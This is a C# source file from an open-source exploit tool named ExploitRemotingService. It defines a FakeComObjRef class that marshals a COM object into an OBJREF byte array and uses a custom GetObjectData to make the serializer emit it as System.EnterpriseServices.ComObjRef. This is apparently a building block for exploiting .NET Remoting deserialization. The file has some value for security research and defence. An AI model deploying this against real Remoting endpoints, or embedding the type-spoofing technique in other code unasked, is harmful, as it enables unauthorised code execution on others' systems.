﻿//    ExploitRemotingService
//    Copyright (C) 2014 James Forshaw
//
//    This program is free software: you can redistribute it and/or modify
//    it under the terms of the GNU General Public License as published by
//    the Free Software Foundation, either version 3 of the License, or
//    (at your option) any later version.
//
//    This program is distributed in the hope that it will be useful,
//    but WITHOUT ANY WARRANTY; without even the implied warranty of
//    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
//    GNU General Public License for more details.
//
//    You should have received a copy of the GNU General Public License
//    along with this program.  If not, see <http://www.gnu.org/licenses/>.

using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;
using System.Runtime.Serialization;

namespace ExploitRemotingService
{
    [Serializable]
    public class FakeComObjRef : ISerializable
    {
        byte[] _marshalledData;

        [DllImport("ole32.dll", CharSet = CharSet.Unicode)]
        private static extern int CreateObjrefMoniker(IntPtr pUnk, out IMoniker ppMoniker);

        [DllImport("ole32.dll", CharSet = CharSet.Unicode)]
        private static extern int CreateBindCtx(uint Reserved, out IBindCtx ppbc);

        // Fast and lazy COM marshalling
        private static byte[] MarshalObject(object obj)
        {
            return MarshalObject(Marshal.GetIUnknownForObject(obj));
        }

        private static byte[] MarshalObject(IntPtr obj)
        {
            IMoniker pMoniker;

            int err = CreateObjrefMoniker(obj, out pMoniker);
            if (err != 0)
            {
                Marshal.ThrowExceptionForHR(err);
            }

            string displayName;

            pMoniker.GetDisplayName(null, null, out displayName);

            return Convert.FromBase64String(displayName.Substring(7, displayName.Length - 8));
        }

        public FakeComObjRef(object obj)
        {
            _marshalledData = MarshalObject(obj);
        }

        public FakeComObjRef(IntPtr obj)
        {
            _marshalledData = MarshalObject(obj);
        }

        public FakeComObjRef(byte[] marshalledData)
        {
            _marshalledData = marshalledData;
        }

        public void GetObjectData(SerializationInfo info, StreamingContext context)
        {
            // Configure the proxy to use the ComObjRef object
            info.AssemblyName = "System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a";
            info.FullTypeName = "System.EnterpriseServices.ComObjRef";

            MemoryStream stm = new MemoryStream();
            BinaryWriter writer = new BinaryWriter(stm);

            writer.Write((uint)0);
            writer.Write(_marshalledData);

            info.AddValue("buffer", stm.ToArray());
        }
    }
}
